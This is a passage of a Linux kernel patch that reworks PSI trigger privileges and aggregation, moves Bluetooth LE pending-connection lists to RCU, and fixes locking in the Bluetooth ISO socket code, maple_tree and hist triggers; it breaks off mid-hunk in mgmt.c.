+@@ -1228,17 +1276,25 @@ int psi_show(struct seq_file *m, struct psi_group *group, enum psi_res res)
+ 	return 0;
+ }
+ 
+-struct psi_trigger *psi_trigger_create(struct psi_group *group,
+-			char *buf, enum psi_res res)
++struct psi_trigger *psi_trigger_create(struct psi_group *group, char *buf,
++				       enum psi_res res, struct file *file,
++				       struct kernfs_open_file *of)
+ {
+ 	struct psi_trigger *t;
+ 	enum psi_states state;
+ 	u32 threshold_us;
++	bool privileged;
+ 	u32 window_us;
+ 
+ 	if (static_branch_likely(&psi_disabled))
+ 		return ERR_PTR(-EOPNOTSUPP);
+ 
++	/*
++	 * Checking the privilege here on file->f_cred implies that a privileged user
++	 * could open the file and delegate the write to an unprivileged one.
++	 */
++	privileged = cap_raised(file->f_cred->cap_effective, CAP_SYS_RESOURCE);
++
+ 	if (sscanf(buf, "some %u %u", &threshold_us, &window_us) == 2)
+ 		state = PSI_IO_SOME + res * 2;
+ 	else if (sscanf(buf, "full %u %u", &threshold_us, &window_us) == 2)
+@@ -1258,6 +1314,13 @@ struct psi_trigger *psi_trigger_create(struct psi_group *group,
+ 		window_us > WINDOW_MAX_US)
+ 		return ERR_PTR(-EINVAL);
+ 
++	/*
++	 * Unprivileged users can only use 2s windows so that averages aggregation
++	 * work is used, and no RT threads need to be spawned.
++	 */
++	if (!privileged && window_us % 2000000)
++		return ERR_PTR(-EINVAL);
++
+ 	/* Check threshold */
+ 	if (threshold_us == 0 || threshold_us > window_us)
+ 		return ERR_PTR(-EINVAL);
+@@ -1275,33 +1338,44 @@ struct psi_trigger *psi_trigger_create(struct psi_group *group,
+ 
+ 	t->event = 0;
+ 	t->last_event_time = 0;
+-	init_waitqueue_head(&t->event_wait);
++	t->of = of;
++	if (!of)
++		init_waitqueue_head(&t->event_wait);
+ 	t->pending_event = false;
++	t->aggregator = privileged ? PSI_POLL : PSI_AVGS;
+ 
+-	mutex_lock(&group->trigger_lock);
++	if (privileged) {
++		mutex_lock(&group->rtpoll_trigger_lock);
+ 
+-	if (!rcu_access_pointer(group->poll_task)) {
+-		struct task_struct *task;
++		if (!rcu_access_pointer(group->rtpoll_task)) {
++			struct task_struct *task;
+ 
+-		task = kthread_create(psi_poll_worker, group, "psimon");
+-		if (IS_ERR(task)) {
+-			kfree(t);
+-			mutex_unlock(&group->trigger_lock);
+-			return ERR_CAST(task);
++			task = kthread_create(psi_rtpoll_worker, group, "psimon");
++			if (IS_ERR(task)) {
++				kfree(t);
++				mutex_unlock(&group->rtpoll_trigger_lock);
++				return ERR_CAST(task);
++			}
++			atomic_set(&group->rtpoll_wakeup, 0);
++			wake_up_process(task);
++			rcu_assign_pointer(group->rtpoll_task, task);
+ 		}
+-		atomic_set(&group->poll_wakeup, 0);
+-		wake_up_process(task);
+-		rcu_assign_pointer(group->poll_task, task);
+-	}
+ 
+-	list_add(&t->node, &group->triggers);
+-	group->poll_min_period = min(group->poll_min_period,
+-		div_u64(t->win.size, UPDATES_PER_WINDOW));
+-	group->nr_triggers[t->state]++;
+-	group->poll_states |= (1 << t->state);
++		list_add(&t->node, &group->rtpoll_triggers);
++		group->rtpoll_min_period = min(group->rtpoll_min_period,
++			div_u64(t->win.size, UPDATES_PER_WINDOW));
++		group->rtpoll_nr_triggers[t->state]++;
++		group->rtpoll_states |= (1 << t->state);
+ 
+-	mutex_unlock(&group->trigger_lock);
++		mutex_unlock(&group->rtpoll_trigger_lock);
++	} else {
++		mutex_lock(&group->avgs_lock);
+ 
++		list_add(&t->node, &group->avg_triggers);
++		group->avg_nr_triggers[t->state]++;
++
++		mutex_unlock(&group->avgs_lock);
++	}
+ 	return t;
+ }
+ 
+@@ -1323,53 +1397,64 @@ void psi_trigger_destroy(struct psi_trigger *t)
+ 	 * being accessed later. Can happen if cgroup is deleted from under a
+ 	 * polling process.
+ 	 */
+-	wake_up_pollfree(&t->event_wait);
+-
+-	mutex_lock(&group->trigger_lock);
+-
+-	if (!list_empty(&t->node)) {
+-		struct psi_trigger *tmp;
+-		u64 period = ULLONG_MAX;
+-
+-		list_del(&t->node);
+-		group->nr_triggers[t->state]--;
+-		if (!group->nr_triggers[t->state])
+-			group->poll_states &= ~(1 << t->state);
+-		/* reset min update period for the remaining triggers */
+-		list_for_each_entry(tmp, &group->triggers, node)
+-			period = min(period, div_u64(tmp->win.size,
+-					UPDATES_PER_WINDOW));
+-		group->poll_min_period = period;
+-		/* Destroy poll_task when the last trigger is destroyed */
+-		if (group->poll_states == 0) {
+-			group->polling_until = 0;
+-			task_to_destroy = rcu_dereference_protected(
+-					group->poll_task,
+-					lockdep_is_held(&group->trigger_lock));
+-			rcu_assign_pointer(group->poll_task, NULL);
+-			del_timer(&group->poll_timer);
++	if (t->of)
++		kernfs_notify(t->of->kn);
++	else
++		wake_up_interruptible(&t->event_wait);
++
++	if (t->aggregator == PSI_AVGS) {
++		mutex_lock(&group->avgs_lock);
++		if (!list_empty(&t->node)) {
++			list_del(&t->node);
++			group->avg_nr_triggers[t->state]--;
++		}
++		mutex_unlock(&group->avgs_lock);
++	} else {
++		mutex_lock(&group->rtpoll_trigger_lock);
++		if (!list_empty(&t->node)) {
++			struct psi_trigger *tmp;
++			u64 period = ULLONG_MAX;
++
++			list_del(&t->node);
++			group->rtpoll_nr_triggers[t->state]--;
++			if (!group->rtpoll_nr_triggers[t->state])
++				group->rtpoll_states &= ~(1 << t->state);
++			/* reset min update period for the remaining triggers */
++			list_for_each_entry(tmp, &group->rtpoll_triggers, node)
++				period = min(period, div_u64(tmp->win.size,
++						UPDATES_PER_WINDOW));
++			group->rtpoll_min_period = period;
++			/* Destroy rtpoll_task when the last trigger is destroyed */
++			if (group->rtpoll_states == 0) {
++				group->rtpoll_until = 0;
++				task_to_destroy = rcu_dereference_protected(
++						group->rtpoll_task,
++						lockdep_is_held(&group->rtpoll_trigger_lock));
++				rcu_assign_pointer(group->rtpoll_task, NULL);
++				del_timer(&group->rtpoll_timer);
++			}
+ 		}
++		mutex_unlock(&group->rtpoll_trigger_lock);
+ 	}
+ 
+-	mutex_unlock(&group->trigger_lock);
+-
+ 	/*
+-	 * Wait for psi_schedule_poll_work RCU to complete its read-side
++	 * Wait for psi_schedule_rtpoll_work RCU to complete its read-side
+ 	 * critical section before destroying the trigger and optionally the
+-	 * poll_task.
++	 * rtpoll_task.
+ 	 */
+ 	synchronize_rcu();
+ 	/*
+-	 * Stop kthread 'psimon' after releasing trigger_lock to prevent a
+-	 * deadlock while waiting for psi_poll_work to acquire trigger_lock
++	 * Stop kthread 'psimon' after releasing rtpoll_trigger_lock to prevent
++	 * a deadlock while waiting for psi_rtpoll_work to acquire
++	 * rtpoll_trigger_lock
+ 	 */
+ 	if (task_to_destroy) {
+ 		/*
+ 		 * After the RCU grace period has expired, the worker
+-		 * can no longer be found through group->poll_task.
++		 * can no longer be found through group->rtpoll_task.
+ 		 */
+ 		kthread_stop(task_to_destroy);
+-		atomic_set(&group->poll_scheduled, 0);
++		atomic_set(&group->rtpoll_scheduled, 0);
+ 	}
+ 	kfree(t);
+ }
+@@ -1387,7 +1472,10 @@ __poll_t psi_trigger_poll(void **trigger_ptr,
+ 	if (!t)
+ 		return DEFAULT_POLLMASK | EPOLLERR | EPOLLPRI;
+ 
+-	poll_wait(file, &t->event_wait, wait);
++	if (t->of)
++		kernfs_generic_poll(t->of, wait);
++	else
++		poll_wait(file, &t->event_wait, wait);
+ 
+ 	if (cmpxchg(&t->event, 1, 0) == 1)
+ 		ret |= EPOLLPRI;
+@@ -1411,27 +1499,19 @@ static int psi_cpu_show(struct seq_file *m, void *v)
+ 	return psi_show(m, &psi_system, PSI_CPU);
+ }
+ 
+-static int psi_open(struct file *file, int (*psi_show)(struct seq_file *, void *))
+-{
+-	if (file->f_mode & FMODE_WRITE && !capable(CAP_SYS_RESOURCE))
+-		return -EPERM;
+-
+-	return single_open(file, psi_show, NULL);
+-}
+-
+ static int psi_io_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_io_show);
++	return single_open(file, psi_io_show, NULL);
+ }
+ 
+ static int psi_memory_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_memory_show);
++	return single_open(file, psi_memory_show, NULL);
+ }
+ 
+ static int psi_cpu_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_cpu_show);
++	return single_open(file, psi_cpu_show, NULL);
+ }
+ 
+ static ssize_t psi_write(struct file *file, const char __user *user_buf,
+@@ -1465,7 +1545,7 @@ static ssize_t psi_write(struct file *file, const char __user *user_buf,
+ 		return -EBUSY;
+ 	}
+ 
+-	new = psi_trigger_create(&psi_system, buf, res);
++	new = psi_trigger_create(&psi_system, buf, res, file, NULL);
+ 	if (IS_ERR(new)) {
+ 		mutex_unlock(&seq->lock);
+ 		return PTR_ERR(new);
+@@ -1545,7 +1625,7 @@ static int psi_irq_show(struct seq_file *m, void *v)
+ 
+ static int psi_irq_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_irq_show);
++	return single_open(file, psi_irq_show, NULL);
+ }
+ 
+ static ssize_t psi_irq_write(struct file *file, const char __user *user_buf,
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 105253b9bc31d..0f5d16eabd3b0 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -6560,7 +6560,8 @@ static int event_hist_trigger_parse(struct event_command *cmd_ops,
+ 		goto out_unreg;
+ 
+ 	if (has_hist_vars(hist_data) || hist_data->n_var_refs) {
+-		if (save_hist_vars(hist_data))
++		ret = save_hist_vars(hist_data);
++		if (ret)
+ 			goto out_unreg;
+ 	}
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 2f1f661157c92..47d0c95b9a01e 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -3711,7 +3711,8 @@ static inline int mas_root_expand(struct ma_state *mas, void *entry)
+ 	mas->offset = slot;
+ 	pivots[slot] = mas->last;
+ 	if (mas->last != ULONG_MAX)
+-		slot++;
++		pivots[++slot] = ULONG_MAX;
++
+ 	mas->depth = 1;
+ 	mas_set_height(mas);
+ 	ma_set_meta(node, maple_leaf_64, 0, slot);
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index fef09d2121384..61059571c8779 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -117,7 +117,7 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ 	 */
+ 	params->explicit_connect = false;
+ 
+-	list_del_init(&params->action);
++	hci_pend_le_list_del_init(params);
+ 
+ 	switch (params->auto_connect) {
+ 	case HCI_AUTO_CONN_EXPLICIT:
+@@ -126,10 +126,10 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ 		return;
+ 	case HCI_AUTO_CONN_DIRECT:
+ 	case HCI_AUTO_CONN_ALWAYS:
+-		list_add(&params->action, &hdev->pend_le_conns);
++		hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		break;
+ 	case HCI_AUTO_CONN_REPORT:
+-		list_add(&params->action, &hdev->pend_le_reports);
++		hci_pend_le_list_add(params, &hdev->pend_le_reports);
+ 		break;
+ 	default:
+ 		break;
+@@ -1398,8 +1398,8 @@ static int hci_explicit_conn_params_set(struct hci_dev *hdev,
+ 	if (params->auto_connect == HCI_AUTO_CONN_DISABLED ||
+ 	    params->auto_connect == HCI_AUTO_CONN_REPORT ||
+ 	    params->auto_connect == HCI_AUTO_CONN_EXPLICIT) {
+-		list_del_init(&params->action);
+-		list_add(&params->action, &hdev->pend_le_conns);
++		hci_pend_le_list_del_init(params);
++		hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 	}
+ 
+ 	params->explicit_connect = true;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index ca42129f8f91a..d034bf2a999e1 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1972,6 +1972,7 @@ static int hci_remove_adv_monitor(struct hci_dev *hdev,
+ 				  struct adv_monitor *monitor)
+ {
+ 	int status = 0;
++	int handle;
+ 
+ 	switch (hci_get_adv_monitor_offload_ext(hdev)) {
+ 	case HCI_ADV_MONITOR_EXT_NONE: /* also goes here when powered off */
+@@ -1980,9 +1981,10 @@ static int hci_remove_adv_monitor(struct hci_dev *hdev,
+ 		goto free_monitor;
+ 
+ 	case HCI_ADV_MONITOR_EXT_MSFT:
++		handle = monitor->handle;
+ 		status = msft_remove_monitor(hdev, monitor);
+ 		bt_dev_dbg(hdev, "%s remove monitor %d msft status %d",
+-			   hdev->name, monitor->handle, status);
++			   hdev->name, handle, status);
+ 		break;
+ 	}
+ 
+@@ -2249,21 +2251,45 @@ struct hci_conn_params *hci_conn_params_lookup(struct hci_dev *hdev,
+ 	return NULL;
+ }
+ 
+-/* This function requires the caller holds hdev->lock */
++/* This function requires the caller holds hdev->lock or rcu_read_lock */
+ struct hci_conn_params *hci_pend_le_action_lookup(struct list_head *list,
+ 						  bdaddr_t *addr, u8 addr_type)
+ {
+ 	struct hci_conn_params *param;
+ 
+-	list_for_each_entry(param, list, action) {
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(param, list, action) {
+ 		if (bacmp(&param->addr, addr) == 0 &&
+-		    param->addr_type == addr_type)
++		    param->addr_type == addr_type) {
++			rcu_read_unlock();
+ 			return param;
++		}
+ 	}
+ 
++	rcu_read_unlock();
++
+ 	return NULL;
+ }
+ 
++/* This function requires the caller holds hdev->lock */
++void hci_pend_le_list_del_init(struct hci_conn_params *param)
++{
++	if (list_empty(&param->action))
++		return;
++
++	list_del_rcu(&param->action);
++	synchronize_rcu();
++	INIT_LIST_HEAD(&param->action);
++}
++
++/* This function requires the caller holds hdev->lock */
++void hci_pend_le_list_add(struct hci_conn_params *param,
++			  struct list_head *list)
++{
++	list_add_rcu(&param->action, list);
++}
++
+ /* This function requires the caller holds hdev->lock */
+ struct hci_conn_params *hci_conn_params_add(struct hci_dev *hdev,
+ 					    bdaddr_t *addr, u8 addr_type)
+@@ -2297,14 +2323,15 @@ struct hci_conn_params *hci_conn_params_add(struct hci_dev *hdev,
+ 	return params;
+ }
+ 
+-static void hci_conn_params_free(struct hci_conn_params *params)
++void hci_conn_params_free(struct hci_conn_params *params)
+ {
++	hci_pend_le_list_del_init(params);
++
+ 	if (params->conn) {
+ 		hci_conn_drop(params->conn);
+ 		hci_conn_put(params->conn);
+ 	}
+ 
+-	list_del(&params->action);
+ 	list_del(&params->list);
+ 	kfree(params);
+ }
+@@ -2342,8 +2369,7 @@ void hci_conn_params_clear_disabled(struct hci_dev *hdev)
+ 			continue;
+ 		}
+ 
+-		list_del(&params->list);
+-		kfree(params);
++		hci_conn_params_free(params);
+ 	}
+ 
+ 	BT_DBG("All LE disabled connection parameters were removed");
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index b272cc1f36481..83eaf25ece465 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -1558,7 +1558,7 @@ static u8 hci_cc_le_set_privacy_mode(struct hci_dev *hdev, void *data,
+ 
+ 	params = hci_conn_params_lookup(hdev, &cp->bdaddr, cp->bdaddr_type);
+ 	if (params)
+-		params->privacy_mode = cp->mode;
++		WRITE_ONCE(params->privacy_mode, cp->mode);
+ 
+ 	hci_dev_unlock(hdev);
+ 
+@@ -2789,6 +2789,9 @@ static void hci_cs_disconnect(struct hci_dev *hdev, u8 status)
+ 			hci_enable_advertising(hdev);
+ 		}
+ 
++		/* Inform sockets conn is gone before we delete it */
++		hci_disconn_cfm(conn, HCI_ERROR_UNSPECIFIED);
++
+ 		goto done;
+ 	}
+ 
+@@ -2809,8 +2812,8 @@ static void hci_cs_disconnect(struct hci_dev *hdev, u8 status)
+ 
+ 		case HCI_AUTO_CONN_DIRECT:
+ 		case HCI_AUTO_CONN_ALWAYS:
+-			list_del_init(&params->action);
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_del_init(params);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 			break;
+ 
+ 		default:
+@@ -3428,8 +3431,8 @@ static void hci_disconn_complete_evt(struct hci_dev *hdev, void *data,
+ 
+ 		case HCI_AUTO_CONN_DIRECT:
+ 		case HCI_AUTO_CONN_ALWAYS:
+-			list_del_init(&params->action);
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_del_init(params);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 			hci_update_passive_scan(hdev);
+ 			break;
+ 
+@@ -5952,7 +5955,7 @@ static void le_conn_complete_evt(struct hci_dev *hdev, u8 status,
+ 	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, &conn->dst,
+ 					   conn->dst_type);
+ 	if (params) {
+-		list_del_init(&params->action);
++		hci_pend_le_list_del_init(params);
+ 		if (params->conn) {
+ 			hci_conn_drop(params->conn);
+ 			hci_conn_put(params->conn);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 37131a36700a1..2ae038dfc39f7 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2139,15 +2139,23 @@ static int hci_le_del_accept_list_sync(struct hci_dev *hdev,
+ 	return 0;
+ }
+ 
++struct conn_params {
++	bdaddr_t addr;
++	u8 addr_type;
++	hci_conn_flags_t flags;
++	u8 privacy_mode;
++};
++
+ /* Adds connection to resolve list if needed.
+  * Setting params to NULL programs local hdev->irk
+  */
+ static int hci_le_add_resolve_list_sync(struct hci_dev *hdev,
+-					struct hci_conn_params *params)
++					struct conn_params *params)
+ {
+ 	struct hci_cp_le_add_to_resolv_list cp;
+ 	struct smp_irk *irk;
+ 	struct bdaddr_list_with_irk *entry;
++	struct hci_conn_params *p;
+ 
+ 	if (!use_ll_privacy(hdev))
+ 		return 0;
+@@ -2182,6 +2190,16 @@ static int hci_le_add_resolve_list_sync(struct hci_dev *hdev,
+ 	/* Default privacy mode is always Network */
+ 	params->privacy_mode = HCI_NETWORK_PRIVACY;
+ 
++	rcu_read_lock();
++	p = hci_pend_le_action_lookup(&hdev->pend_le_conns,
++				      &params->addr, params->addr_type);
++	if (!p)
++		p = hci_pend_le_action_lookup(&hdev->pend_le_reports,
++					      &params->addr, params->addr_type);
++	if (p)
++		WRITE_ONCE(p->privacy_mode, HCI_NETWORK_PRIVACY);
++	rcu_read_unlock();
++
+ done:
+ 	if (hci_dev_test_flag(hdev, HCI_PRIVACY))
+ 		memcpy(cp.local_irk, hdev->irk, 16);
+@@ -2194,7 +2212,7 @@ done:
+ 
+ /* Set Device Privacy Mode. */
+ static int hci_le_set_privacy_mode_sync(struct hci_dev *hdev,
+-					struct hci_conn_params *params)
++					struct conn_params *params)
+ {
+ 	struct hci_cp_le_set_privacy_mode cp;
+ 	struct smp_irk *irk;
+@@ -2219,6 +2237,8 @@ static int hci_le_set_privacy_mode_sync(struct hci_dev *hdev,
+ 	bacpy(&cp.bdaddr, &irk->bdaddr);
+ 	cp.mode = HCI_DEVICE_PRIVACY;
+ 
++	/* Note: params->privacy_mode is not updated since it is a copy */
++
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_SET_PRIVACY_MODE,
+ 				     sizeof(cp), &cp, HCI_CMD_TIMEOUT);
+ }
+@@ -2228,7 +2248,7 @@ static int hci_le_set_privacy_mode_sync(struct hci_dev *hdev,
+  * properly set the privacy mode.
+  */
+ static int hci_le_add_accept_list_sync(struct hci_dev *hdev,
+-				       struct hci_conn_params *params,
++				       struct conn_params *params,
+ 				       u8 *num_entries)
+ {
+ 	struct hci_cp_le_add_to_accept_list cp;
+@@ -2426,6 +2446,52 @@ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+ 	return __hci_cmd_sync_sk(hdev, opcode, 0, NULL, 0, HCI_CMD_TIMEOUT, sk);
+ }
+ 
++static struct conn_params *conn_params_copy(struct list_head *list, size_t *n)
++{
++	struct hci_conn_params *params;
++	struct conn_params *p;
++	size_t i;
++
++	rcu_read_lock();
++
++	i = 0;
++	list_for_each_entry_rcu(params, list, action)
++		++i;
++	*n = i;
++
++	rcu_read_unlock();
++
++	p = kvcalloc(*n, sizeof(struct conn_params), GFP_KERNEL);
++	if (!p)
++		return NULL;
++
++	rcu_read_lock();
++
++	i = 0;
++	list_for_each_entry_rcu(params, list, action) {
++		/* Racing adds are handled in next scan update */
++		if (i >= *n)
++			break;
++
++		/* No hdev->lock, but: addr, addr_type are immutable.
++		 * privacy_mode is only written by us or in
++		 * hci_cc_le_set_privacy_mode that we wait for.
++		 * We should be idempotent so MGMT updating flags
++		 * while we are processing is OK.
++		 */
++		bacpy(&p[i].addr, &params->addr);
++		p[i].addr_type = params->addr_type;
++		p[i].flags = READ_ONCE(params->flags);
++		p[i].privacy_mode = READ_ONCE(params->privacy_mode);
++		++i;
++	}
++
++	rcu_read_unlock();
++
++	*n = i;
++	return p;
++}
++
+ /* Device must not be scanning when updating the accept list.
+  *
+  * Update is done using the following sequence:
+@@ -2445,11 +2511,12 @@ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+  */
+ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ {
+-	struct hci_conn_params *params;
++	struct conn_params *params;
+ 	struct bdaddr_list *b, *t;
+ 	u8 num_entries = 0;
+ 	bool pend_conn, pend_report;
+ 	u8 filter_policy;
++	size_t i, n;
+ 	int err;
+ 
+ 	/* Pause advertising if resolving list can be used as controllers
+@@ -2483,6 +2550,7 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 		if (hci_conn_hash_lookup_le(hdev, &b->bdaddr, b->bdaddr_type))
+ 			continue;
+ 
++		/* Pointers not dereferenced, no locks needed */
+ 		pend_conn = hci_pend_le_action_lookup(&hdev->pend_le_conns,
+ 						      &b->bdaddr,
+ 						      b->bdaddr_type);
+@@ -2511,23 +2579,50 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 	 * available accept list entries in the controller, then
+ 	 * just abort and return filer policy value to not use the
+ 	 * accept list.
++	 *
++	 * The list and params may be mutated while we wait for events,
++	 * so make a copy and iterate it.
+ 	 */
+-	list_for_each_entry(params, &hdev->pend_le_conns, action) {
+-		err = hci_le_add_accept_list_sync(hdev, params, &num_entries);
+-		if (err)
++
++	params = conn_params_copy(&hdev->pend_le_conns, &n);
++	if (!params) {
++		err = -ENOMEM;
++		goto done;
++	}
++
++	for (i = 0; i < n; ++i) {
++		err = hci_le_add_accept_list_sync(hdev, &params[i],
++						  &num_entries);
++		if (err) {
++			kvfree(params);
+ 			goto done;
++		}
+ 	}
+ 
++	kvfree(params);
++
+ 	/* After adding all new pending connections, walk through
+ 	 * the list of pending reports and also add these to the
+ 	 * accept list if there is still space. Abort if space runs out.
+ 	 */
+-	list_for_each_entry(params, &hdev->pend_le_reports, action) {
+-		err = hci_le_add_accept_list_sync(hdev, params, &num_entries);
+-		if (err)
++
++	params = conn_params_copy(&hdev->pend_le_reports, &n);
++	if (!params) {
++		err = -ENOMEM;
++		goto done;
++	}
++
++	for (i = 0; i < n; ++i) {
++		err = hci_le_add_accept_list_sync(hdev, &params[i],
++						  &num_entries);
++		if (err) {
++			kvfree(params);
+ 			goto done;
++		}
+ 	}
+ 
++	kvfree(params);
++
+ 	/* Use the allowlist unless the following conditions are all true:
+ 	 * - We are not currently suspending
+ 	 * - There are 1 or more ADV monitors registered and it's not offloaded
+@@ -4778,12 +4873,12 @@ static void hci_pend_le_actions_clear(struct hci_dev *hdev)
+ 	struct hci_conn_params *p;
+ 
+ 	list_for_each_entry(p, &hdev->le_conn_params, list) {
++		hci_pend_le_list_del_init(p);
+ 		if (p->conn) {
+ 			hci_conn_drop(p->conn);
+ 			hci_conn_put(p->conn);
+ 			p->conn = NULL;
+ 		}
+-		list_del_init(&p->action);
+ 	}
+ 
+ 	BT_DBG("All LE pending actions cleared");
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index cb959e8eac185..699e4f400df29 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -116,8 +116,11 @@ static struct iso_conn *iso_conn_add(struct hci_conn *hcon)
+ {
+ 	struct iso_conn *conn = hcon->iso_data;
+ 
+-	if (conn)
++	if (conn) {
++		if (!conn->hcon)
++			conn->hcon = hcon;
+ 		return conn;
++	}
+ 
+ 	conn = kzalloc(sizeof(*conn), GFP_KERNEL);
+ 	if (!conn)
+@@ -285,14 +288,13 @@ static int iso_connect_bis(struct sock *sk)
+ 		goto unlock;
+ 	}
+ 
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
++	lock_sock(sk);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+-	if (err)
+-		return err;
+-
+-	lock_sock(sk);
++	if (err) {
++		release_sock(sk);
++		goto unlock;
++	}
+ 
+ 	/* Update source addr of the socket */
+ 	bacpy(&iso_pi(sk)->src, &hcon->src);
+@@ -306,7 +308,6 @@ static int iso_connect_bis(struct sock *sk)
+ 	}
+ 
+ 	release_sock(sk);
+-	return err;
+ 
+ unlock:
+ 	hci_dev_unlock(hdev);
+@@ -367,14 +368,13 @@ static int iso_connect_cis(struct sock *sk)
+ 		goto unlock;
+ 	}
+ 
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
++	lock_sock(sk);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+-	if (err)
+-		return err;
+-
+-	lock_sock(sk);
++	if (err) {
++		release_sock(sk);
++		goto unlock;
++	}
+ 
+ 	/* Update source addr of the socket */
+ 	bacpy(&iso_pi(sk)->src, &hcon->src);
+@@ -391,7 +391,6 @@ static int iso_connect_cis(struct sock *sk)
+ 	}
+ 
+ 	release_sock(sk);
+-	return err;
+ 
+ unlock:
+ 	hci_dev_unlock(hdev);
+@@ -1036,8 +1035,8 @@ static int iso_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 			    size_t len)
+ {
+ 	struct sock *sk = sock->sk;
+-	struct iso_conn *conn = iso_pi(sk)->conn;
+ 	struct sk_buff *skb, **frag;
++	size_t mtu;
+ 	int err;
+ 
+ 	BT_DBG("sock %p, sk %p", sock, sk);
+@@ -1049,11 +1048,18 @@ static int iso_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	if (msg->msg_flags & MSG_OOB)
+ 		return -EOPNOTSUPP;
+ 
+-	if (sk->sk_state != BT_CONNECTED)
++	lock_sock(sk);
++
++	if (sk->sk_state != BT_CONNECTED) {
++		release_sock(sk);
+ 		return -ENOTCONN;
++	}
++
++	mtu = iso_pi(sk)->conn->hcon->hdev->iso_mtu;
++
++	release_sock(sk);
+ 
+-	skb = bt_skb_sendmsg(sk, msg, len, conn->hcon->hdev->iso_mtu,
+-			     HCI_ISO_DATA_HDR_SIZE, 0);
++	skb = bt_skb_sendmsg(sk, msg, len, mtu, HCI_ISO_DATA_HDR_SIZE, 0);
+ 	if (IS_ERR(skb))
+ 		return PTR_ERR(skb);
+ 
+@@ -1066,8 +1072,7 @@ static int iso_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	while (len) {
+ 		struct sk_buff *tmp;
+ 
+-		tmp = bt_skb_sendmsg(sk, msg, len, conn->hcon->hdev->iso_mtu,
+-				     0, 0);
++		tmp = bt_skb_sendmsg(sk, msg, len, mtu, 0, 0);
+ 		if (IS_ERR(tmp)) {
+ 			kfree_skb(skb);
+ 			return PTR_ERR(tmp);
+@@ -1122,15 +1127,19 @@ static int iso_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ 	BT_DBG("sk %p", sk);
+ 
+ 	if (test_and_clear_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) {
++		lock_sock(sk);
+ 		switch (sk->sk_state) {
+ 		case BT_CONNECT2:
+-			lock_sock(sk);
+ 			iso_conn_defer_accept(pi->conn->hcon);
+ 			sk->sk_state = BT_CONFIG;
+ 			release_sock(sk);
+ 			return 0;
+ 		case BT_CONNECT:
++			release_sock(sk);
+ 			return iso_connect_cis(sk);
++		default:
++			release_sock(sk);
++			break;
+ 		}
+ 	}
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 815f2abe918ef..89c94f3e96bc3 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -1297,15 +1297,15 @@ static void restart_le_actions(struct hci_dev *hdev)
+ 		/* Needed for AUTO_OFF case where might not "really"
+ 		 * have been powered off.
+ 		 */
+-		list_del_init(&p->action);
++		hci_pend_le_list_del_init(p);
+ 
+ 		switch (p->auto_connect) {
+ 		case HCI_AUTO_CONN_DIRECT:
+ 		case HCI_AUTO_CONN_ALWAYS:
+-			list_add(&p->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(p, &hdev->pend_le_conns);
+ 			break;
+ 		case HCI_AUTO_CONN_REPORT:
+-			list_add(&p->action, &hdev->pend_le_reports);
++			hci_pend_le_list_add(p, &hdev->pend_le_reports);
+ 			break;
+ 		default:
+ 			break;
+@@ -5161,7 +5161,7 @@ static int set_device_flags(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto unlock;
+ 	}
+ 
+-	params->flags = current_flags;
++	WRITE_ONCE(params->flags, current_flags);
+ 	status = MGMT_STATUS_SUCCESS;
+ 
+ 	/* Update passive scan if HCI_CONN_FLAG_DEVICE_PRIVACY
+@@ -7573,7 +7573,7 @@ static int hci_conn_params_set(struct hci_dev *hdev, bdaddr_t *addr,
+ 	if (params->auto_connect == auto_connect)
+ 		return 0;
+ 
